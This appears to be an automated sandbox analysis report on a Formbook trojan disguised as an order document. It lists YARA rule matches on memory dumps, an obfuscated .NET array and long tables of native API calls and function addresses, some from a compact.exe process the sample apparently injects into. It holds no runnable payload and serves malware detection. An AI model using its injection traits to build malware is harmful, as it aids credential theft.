            Source: Yara matchFile source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large array initializations
            Source: 0.2.spec 4008670601 AZTEK Order.exe.6eb0000.4.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: 0.2.spec 4008670601 AZTEK Order.exe.288c328.0.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: spec 4008670601 AZTEK Order.exe
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0042B683 NtClose,6_2_0042B683
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2B60 NtClose,LdrInitializeThunk,6_2_017E2B60
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_017E2DF0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_017E2C70
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E35C0 NtCreateMutant,LdrInitializeThunk,6_2_017E35C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E4340 NtSetContextThread,6_2_017E4340
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E4650 NtSuspendThread,6_2_017E4650
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2BF0 NtAllocateVirtualMemory,6_2_017E2BF0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2BE0 NtQueryValueKey,6_2_017E2BE0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2BA0 NtEnumerateValueKey,6_2_017E2BA0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2B80 NtQueryInformationFile,6_2_017E2B80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2AF0 NtWriteFile,6_2_017E2AF0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2AD0 NtReadFile,6_2_017E2AD0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2AB0 NtWaitForSingleObject,6_2_017E2AB0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2D30 NtUnmapViewOfSection,6_2_017E2D30
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2D10 NtMapViewOfSection,6_2_017E2D10
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2D00 NtSetInformationFile,6_2_017E2D00
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2DD0 NtDelayExecution,6_2_017E2DD0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2DB0 NtEnumerateKey,6_2_017E2DB0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2C60 NtCreateKey,6_2_017E2C60
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2C00 NtQueryInformationProcess,6_2_017E2C00
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2CF0 NtOpenProcess,6_2_017E2CF0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2CC0 NtQueryVirtualMemory,6_2_017E2CC0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2CA0 NtQueryInformationToken,6_2_017E2CA0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2F60 NtCreateProcessEx,6_2_017E2F60
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2F30 NtCreateSection,6_2_017E2F30
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2FE0 NtCreateFile,6_2_017E2FE0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2FB0 NtResumeThread,6_2_017E2FB0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2FA0 NtQuerySection,6_2_017E2FA0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2F90 NtProtectVirtualMemory,6_2_017E2F90
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2E30 NtWriteVirtualMemory,6_2_017E2E30
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2EE0 NtQueueApcThread,6_2_017E2EE0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2EA0 NtAdjustPrivilegesToken,6_2_017E2EA0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2E80 NtReadVirtualMemory,6_2_017E2E80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E3010 NtOpenDirectoryObject,6_2_017E3010
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E3090 NtSetValueKey,6_2_017E3090
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E39B0 NtGetContextThread,6_2_017E39B0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E3D70 NtOpenThread,6_2_017E3D70
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E3D10 NtOpenProcessToken,6_2_017E3D10
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03744340 NtSetContextThread,LdrInitializeThunk,12_2_03744340
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03744650 NtSuspendThread,LdrInitializeThunk,12_2_03744650
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742B60 NtClose,LdrInitializeThunk,12_2_03742B60
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_03742BF0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742BE0 NtQueryValueKey,LdrInitializeThunk,12_2_03742BE0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_03742BA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742AF0 NtWriteFile,LdrInitializeThunk,12_2_03742AF0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742AD0 NtReadFile,LdrInitializeThunk,12_2_03742AD0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742F30 NtCreateSection,LdrInitializeThunk,12_2_03742F30
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742FE0 NtCreateFile,LdrInitializeThunk,12_2_03742FE0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742FB0 NtResumeThread,LdrInitializeThunk,12_2_03742FB0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742EE0 NtQueueApcThread,LdrInitializeThunk,12_2_03742EE0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_03742E80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_03742D30
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742D10 NtMapViewOfSection,LdrInitializeThunk,12_2_03742D10
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_03742DF0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742DD0 NtDelayExecution,LdrInitializeThunk,12_2_03742DD0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_03742C70
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742C60 NtCreateKey,LdrInitializeThunk,12_2_03742C60
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_03742CA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037435C0 NtCreateMutant,LdrInitializeThunk,12_2_037435C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037439B0 NtGetContextThread,LdrInitializeThunk,12_2_037439B0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742B80 NtQueryInformationFile,12_2_03742B80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742AB0 NtWaitForSingleObject,12_2_03742AB0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742F60 NtCreateProcessEx,12_2_03742F60
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742FA0 NtQuerySection,12_2_03742FA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742F90 NtProtectVirtualMemory,12_2_03742F90
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742E30 NtWriteVirtualMemory,12_2_03742E30
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742EA0 NtAdjustPrivilegesToken,12_2_03742EA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742D00 NtSetInformationFile,12_2_03742D00
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742DB0 NtEnumerateKey,12_2_03742DB0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742C00 NtQueryInformationProcess,12_2_03742C00
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742CF0 NtOpenProcess,12_2_03742CF0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03742CC0 NtQueryVirtualMemory,12_2_03742CC0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03743010 NtOpenDirectoryObject,12_2_03743010
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03743090 NtSetValueKey,12_2_03743090
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03743D70 NtOpenThread,12_2_03743D70
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03743D10 NtOpenProcessToken,12_2_03743D10
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DE82E0 NtClose,12_2_02DE82E0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DE8250 NtDeleteFile,12_2_02DE8250
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DE8010 NtCreateFile,12_2_02DE8010
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DE8170 NtReadFile,12_2_02DE8170
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DE8430 NtAllocateVirtualMemory,12_2_02DE8430
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_00B9D3640_2_00B9D364
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_04880C500_2_04880C50
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_04886DD80_2_04886DD8
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_048816000_2_04881600
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_048861380_2_04886138
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_04881AF80_2_04881AF8
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA72F00_2_06DA72F0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA10600_2_06DA1060
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA7F280_2_06DA7F28
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA3D500_2_06DA3D50
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA87880_2_06DA8788
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA877B0_2_06DA877B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA87790_2_06DA8779
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA24500_2_06DA2450
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA24600_2_06DA2460
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DAF2380_2_06DAF238
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA3EE30_2_06DA3EE3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA0F890_2_06DA0F89
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA7F180_2_06DA7F18
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA3D420_2_06DA3D42
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA79780_2_06DA7978
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA79670_2_06DA7967
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA19180_2_06DA1918
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA190A0_2_06DA190A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_004010B06_2_004010B0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_004031406_2_00403140
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0041020A6_2_0041020A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_004102136_2_00410213
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0042DAB36_2_0042DAB3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_00416B616_2_00416B61
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_00416B636_2_00416B63
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_004024606_2_00402460
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_004104336_2_00410433
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0040E4B36_2_0040E4B3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_004026606_2_00402660
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0040E68E6_2_0040E68E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018641A26_2_018641A2
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018701AA6_2_018701AA
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018681CC6_2_018681CC
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A01006_2_017A0100
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184A1186_2_0184A118
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018381586_2_01838158
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018420006_2_01842000
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018703E66_2_018703E6
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BE3F06_2_017BE3F0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186A3526_2_0186A352
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018302C06_2_018302C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018502746_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018705916_2_01870591
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B05356_2_017B0535
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0185E4F66_2_0185E4F6
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018544206_2_01854420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018624466_2_01862446
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B07706_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D47506_2_017D4750
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AC7C06_2_017AC7C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CC6E06_2_017CC6E0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C69626_2_017C6962
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0187A9A66_2_0187A9A6
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B29A06_2_017B29A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BA8406_2_017BA840
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B28406_2_017B2840
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE8F06_2_017DE8F0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017968B86_2_017968B8
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01866BD76_2_01866BD7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186AB406_2_0186AB40
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AEA806_2_017AEA80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BAD006_2_017BAD00
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AADE06_2_017AADE0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184CD1F6_2_0184CD1F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C8DBF6_2_017C8DBF
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850CB56_2_01850CB5
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0C006_2_017B0C00
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A0CF26_2_017A0CF2
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182EFA06_2_0182EFA0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D0F306_2_017D0F30
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017F2F286_2_017F2F28
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BCFE06_2_017BCFE0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A2FC86_2_017A2FC8
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01852F306_2_01852F30
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01824F406_2_01824F40
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186CE936_2_0186CE93
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0E596_2_017B0E59
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186EEDB6_2_0186EEDB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186EE266_2_0186EE26
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C2E906_2_017C2E90
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179F1726_2_0179F172
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E516C6_2_017E516C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BB1B06_2_017BB1B0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0187B16B6_2_0187B16B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0185F0CC6_2_0185F0CC
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186F0E06_2_0186F0E0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018670E96_2_018670E9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B70C06_2_017B70C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179D34C6_2_0179D34C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186132D6_2_0186132D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017F739A6_2_017F739A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018512ED6_2_018512ED
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CB2C06_2_017CB2C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B52A06_2_017B52A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184D5B06_2_0184D5B0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018675716_2_01867571
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A14606_2_017A1460
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186F43F6_2_0186F43F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186F7B06_2_0186F7B0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018616CC6_2_018616CC
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017F56306_2_017F5630
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B99506_2_017B9950
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CB9506_2_017CB950
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018459106_2_01845910
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181D8006_2_0181D800
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B38E06_2_017B38E0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01825BF06_2_01825BF0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017EDBF96_2_017EDBF9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186FB766_2_0186FB76
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CFB806_2_017CFB80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01851AA36_2_01851AA3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184DAAC6_2_0184DAAC
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0185DAC66_2_0185DAC6
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01867A466_2_01867A46
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186FA496_2_0186FA49
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017F5AA06_2_017F5AA0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01823A6C6_2_01823A6C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B3D406_2_017B3D40
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CFDC06_2_017CFDC0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01861D5A6_2_01861D5A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01867D736_2_01867D73
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186FCF26_2_0186FCF2
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01829C326_2_01829C32
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186FFB16_2_0186FFB1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186FF096_2_0186FF09
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B1F926_2_017B1F92
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B9EB06_2_017B9EB0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CA35212_2_037CA352
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371E3F012_2_0371E3F0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037D03E612_2_037D03E6
